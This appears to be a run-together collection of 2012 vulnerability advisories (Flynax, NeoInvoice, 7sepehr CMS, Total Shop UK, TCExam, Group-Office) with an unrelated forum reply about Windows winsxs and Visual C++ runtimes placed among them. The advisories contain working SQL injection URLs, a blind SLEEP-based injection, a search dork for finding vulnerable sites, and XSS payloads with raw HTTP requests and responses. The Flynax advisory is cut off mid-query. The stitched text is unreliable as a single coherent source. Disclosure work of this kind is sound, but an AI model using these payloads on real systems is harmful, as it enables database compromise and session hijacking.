[+] Titel 1.3 Multiple non persistent cross site scripting vulnerabilities are detected in the Flynax General Classifieds v4.0 Content Management System. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The bugs are located in the seach module with the bound vulnerable Titel Price parameters. Successful exploitation can result in account steal, client side phishing client-side content request manipulation. Exploitation requires medium or high user inter action without privileged web application user account. Vulnerable Module(s): [+] Search Vulnerable Parameter(s): [+] Titel [+] Price Proof of Concept: = 1.1 The SQL Injection Vulnerability can be exploited by remote attackers without user inter action without privileged user account. For demonstration or reproduce ... PoC: http://general.[SERVER]:1339/general?sort_by=-1 union all select 1,2,3,4,5,6,7,8,9,@@version,11-- --- Exception Logs --- MYSQL ERROR Error: Unknown column 'T1.' in 'order clause' Query: SELECT SQL_CALC_FOUND_ROWS DISTINCT SUBSTRING_INDEX(GROUP_CONCAT(DISTINCT `T6`.`Thumbnail` ORDER BY `T6`.`Type` DESC, `T6`.`ID` ASC), ',', 1) AS `Main_photo`, `T1`.*, `T1`.`Shows`, `T3`.`Path` AS `Path`, `T3`.`Key` AS `Key`, `T3`.`Type` AS `Listing_type`, COUNT(`T6`.`Thumbnail`) AS `Photos_count`, IF(UNIX_TIMESTAMP(DATE_ADD(`T1`.`Featured_date`, INTERVAL `T2`.` Listing_period` DAY)) UNIX_TIMESTAMP(NOW()) OR `T2`.`Listing_period` = 0, '1', '0') `Featured` FROM `fl_listings` AS `T1` LEFT JOIN `fl_listing_plans` AS `T2` ON `T1`.`Plan_ID` = `T2`.`ID` LEFT JOIN `fl_categories` AS `T3` ON `T1`.`Category_ID` = `T3`.`ID` LEFT JOIN `fl_listing_photos` AS `T6` ON `T1`.`ID` = `T6`.`Listing_ID` LEFT JOIN `fl_accounts` AS `T7` ON `T1`.`
Re: How well does Microsoft support (and follow) their mantra keep your PC updated?
Hi, I am not sure if I got your point. First, winsxs is Microsoft's Windows file repository. Every part of Windows is splitted into components and packages. Every package will be copied into the winsxs folder. But the content of the winsxs folder doesn't represent the currently installed features. So for example you could have the IIS package in winsxs, but IIS isn't currently installed on your system. But if you would install IIS now, you won't be prompted for a Windows installation media, because the package is already in the winsxs folder. Same applies to updates: If a new version of a package becomes available (Hotfix, Security Update or just a normal update), Windows will copy the new package into the winsxs folder, next to the already existing older version of the package. This will let the winsxs folder grow, but will also make sure that you are able to remove *every* package at *every* time you want, because you are able to reinstall the previous version. I hope this was clear and nothing new for you. So what's your point? What's wrong when multiple versions of the Visual C++ runtimes are present in the winsxs folder? Nothing. It is only important which version is marked as active. I agree with you: It is not nice, to ship installers with outdated components installer. But it wouldn't be better to release an updated installer every 2 month... So if Microsoft (or any other company) will ship a new program today, it should be bundled with the latest version of the component they are using, because if I haven't installed this component at the moment, I don't want to be vulnerable *after* I install a new product (BTW: Did you ever noticed the end of the Office installation? Microsoft is prompting you to visit Windows updates, just because they know that they will have installed a product/components, which are already out of date). From my experience, Windows Updates is keeping my Windows components like Visual C++ runtimes up to date: http://f.666kb.com/i/c6auyx3go8yvhktuo.jpg So if you noticed an undetected old version, this is a bug and should be reported to Microsoft. They often re-release Windows Updates because of wrong/improved detections. Regarding VC++ 2005 is end of life: If you are expecting, that programs compiled against a specific runtime version will be recompiled, just because the runtime is end of life, you are wrong and - from my point of view - have not understand how runtimes will be used and why it isn't really a risk. But as I said in the beginning, maybe I didn't get your point. -- Regards, Thomas
NeoInvoice Blind SQL Injection (CVE-2012-3477)
NeoInvoice is a multi-tenant open source invoicing system, that currently contains an unauthenticated blind SQL injection condition in signup_check.php. The input for the value field isn't being properly sanitized, and is used in string concatenation to create the SQL query. See here for the offending code: https://github.com/tlhunter/neoinvoice/blob/5e7af94641cba17df9141e95108c369cfb6e6dd5/public/signup_check.php#L29 Proof of concept: signup_check.php?field=usernamevalue='+OR+SLEEP(5)+OR+' I've alerted the author but haven't heard back. More Info: http://adamcaudill.com/2012/08/12/neoinvoice-blind-sql-injection-cve-2012-3477/ Project: https://github.com/tlhunter/neoinvoice --Adam Caudill http://adamcaudill.com
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities
Title: == 7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities Date: = 2012-08-12 References: === http://www.vulnerability-lab.com/get_content.php?id=679 VL-ID: = 680 Common Vulnerability Scoring System: 8.3 Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered multiple SQL Injection Vulnerabilities in the 7sepehr CMS. Report-Timeline: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com) Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQL Injection vulnerabilities are detected in the official 7sepehr.com Content Management System 2012. Remote attackers can execute/inject own sql commands to compromise the affected application dbms. The vulnerabilities are located in the news_detail, news_view and content asp modules with the bound vulnerable id parameter. Successful exploitation of the remote sql injection vulnerability result in dbmsor web application compromise. Vulnerable File(s): [+] news_Detail.asp [+] newsview.asp [+] contents.aspx Vulnerable Parameter(s): [+] id Proof of Concept: = The remote sql injection vulnerabilities can be exploited by remote attackers without privileged user account without required user inter action. For demonstration or reproduce ... Dork: `Powered by 7sepehr.com` PoC: http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]-- http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]-- http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION VULNERABILITY]-- Risk: = The security risk of the remote sql injection vulnerabilities are estimated as critical. Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Total Shop UK eCommerce Generic Cross-Site Scripting
/--\ | Total Shop UK eCommerce Generic Cross-Site Scripting | \--/ Summary === The open source version of Total Shop UK eCommerce based on CodeIgniter version 2.1.2 is subject to a cross-site scripting vulnerability. The value of a generic parameter was not sufficiently sanitised before being written to a block of Javascript code. An attacker could distribute a malicious URL that would trigger this vulnerability and potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine. CVE number: CVE-2012-4236 Impact: Medium Vendor homepage: http://www.totalshopuk.com/ Vendor notified: 06/08/2012 Credit: Chris Cooper of Reaction Information Security (http://www.reactionis.co.uk/) This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html Affected Products Total Shop UK eCommerce based on CodeIgniter version 2.1.2 (open source version). Other versions may be affected. Details === Generic parameters in the /application/modules/_main/views/_top.php file are written to a Javascript function in the page header without sanitisation. The entire URL, including the query string, is written (via a PHP echo construct) into a refresh_page() Javascript function. It was possible to escape the function and execute arbitrary Javascript code on the application pages. There is some character filtering in place, although this can be evaded by inserting a null (%00) character (see proof of concept). Impact == An attacker might entice users to follow a malicious URL, causing Javascript code to execute in their browser, potentially stealing session cookies, redirecting the user to a malicious URL or downloading malware onto their machine. Proof of Concept = == === Injecting the following Javascript code into a generic parameter on any application page will trigger the vulnerability, causing the page to return a Javascript alert box. %00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{// --- Example 1 Request: +- GET /?%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//=1 HTTP/1.1 Host: 192.168.0.6 Referer: http://192.168.0.6/about --- Example 1 Response: +-- --- SNIP --- function refresh_page(){ parent.location=/?%00;};alert(String.fromCharCode(120,115,115,116,101,115, 116));{//=1; } --- SNIP --- Solution Upgrade to Total Shop UK eCommerce 2.1.2_p1. Download link here: http://sourceforge.net/projects/totalshopuk/files/TSUK_eCommerce_v2.1.2_p1.z ip/download Distribution In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients. * bugtraq () securityfocus com * full-disclosure () lists grok org uk Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates: http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html == Reaction Information Security Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF Phone: +44 (0)1227 785050 Email: research () reactionis {dot} co {dot} uk Web: http://www.reactionpenetrationtesting.co.uk
TCExam Edit Cross-Site Scripting
/--\ | TCExam Edit Cross-Site Scripting | \--/ Summary === TCExam 11.3.007 is subject to a cross-site scripting vulnerability. A 'question_subject_id' parameter is not sufficiently sanitised before being written to the tce_edit_answer.php page. An attacker could distribute a malicious URL to specific users as part of a spear-phishing campaign. Users following the link would trigger this vulnerability which could potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine. CVE number: CVE-2012-4238 Impact: Medium Vendor homepage: http://www.tcexam.org/ Vendor notified: 06/08/2012 Vendor fixed: 06/08/2012 Credit: Chris Cooper of Reaction Information Security (http://www.reactionis.co.uk/) This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html Affected Products Confirmed in TCExam 11.3.007. Prior versions may also be affected. Details === The question_subject_id parameter on the tce_edit_answer.php page was found to be subject to a cross-site scripting vulnerability. It was possible to inject arbitrary Javascript code into the parameter which is passed into the page content without sanitisation. The fact that the user must be authenticated as well as an administrator (permission level 5 or above) reduces the likelihood of a successful attack. However, the vulnerability could potentially be leveraged in a spear phishing attack, targeted at exam authors and administrators, to hijack their sessions. Impact == An attacker might entice users to follow a malicious URL, causing Javascript code to execute in their browser, potentially stealing session cookies, redirecting the user to a malicious URL or downloading malware onto their machine. Proof of Concept = == === Injecting the following Javascript code into a generic parameter on the calendar page will trigger the vulnerability, causing the page to return a Javascript alert box. scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/script --- Example 1 Request: +- GET /TCExam/admin/code/tce_edit_answer.php?subject_module_id=2question_subject_ id=1scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/scrip tanswer_question_id=7 HTTP/1.1 Host: 192.168.0.6 Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df --- Example 1 Response: +-- --- SNIP --- a href=tce_edit_question.php?subject_module_id=2amp;question_subject_id=1\ scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/scriptamp ;question_id=7 title=Question Management class=xmlbuttonlt; Question Management/a/span --- SNIP --- Solution Upgrade to TCExam 11.3.008. Distribution In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients. * bugtraq () securityfocus com * full-disclosure () lists grok org uk Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates: http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html == Reaction Information Security Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF Phone: +44 (0)1227 785050 Email: research () reactionis {dot} co {dot} uk Web: http://www.reactionpenetrationtesting.co.uk
Group-Office Cleartext Credentials Stored in Cookies
/--\ | Group-Office Cleartext Credentials Stored in Cookies | \--/ Summary === Group-Office 4.0.71 was found to display a behaviour that could potentially expose a user's username and cleartext password to third-parties. Under certain circumstances the application would return two cookies, one containing the user's username and the other their cleartext password. These cookies would then be returned to the server with each request to the application. CVE number: CVE-2012-4239 Impact: Medium Vendor homepage: http://www.group-office.com/ Vendor notified: 19/07/2012 Vendor fixed: 25/07/2012 Credit: Chris Cooper and Joseph Sheridan of Reaction Information Security (http://www.reactionpenetrationtesting.co.uk/) This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html Affected Products Confirmed in Group-Office community 4.0.71. Other versions may also be affected. Details === When logging into the application, if a user ticks the 'Remember my login on this computer until I press logout' box, and then successfully logs into the application, two cookies ('GO_UN' and 'GO_PW') are returned. These cookies contain the user's username and cleartext password respectively. The cookies are set with the 'HttpOnly' flag which would significantly reduce the chances of their disclosure during a cross-site scripting attack. However, the application does not enforce a secure channel by default, and the offending cookies are not set with the 'Secure' flag. Impact == Once these cookies are stored, the user's username and password could be transferred over an insecure HTTP connection, increasing the liklihood that an attacker might be able to intercept the credentials and access the application. Furthermore, the cleartext credentials will be stored on the computer which makes them more easily accessible to an attacker with access to the machine. This significantly lowers the difficulty of exploitation. Solution Upgrade to Group-Office community 4.0.73. Distribution In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients. * bugtraq () securityfocus com * full-disclosure () lists grok org uk Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates: http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html == Reaction Information Security Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF Phone: +44 (0)1227 785050 Email: research () reactionis {dot} co {dot} uk Web: http://www.reactionpenetrationtesting.co.uk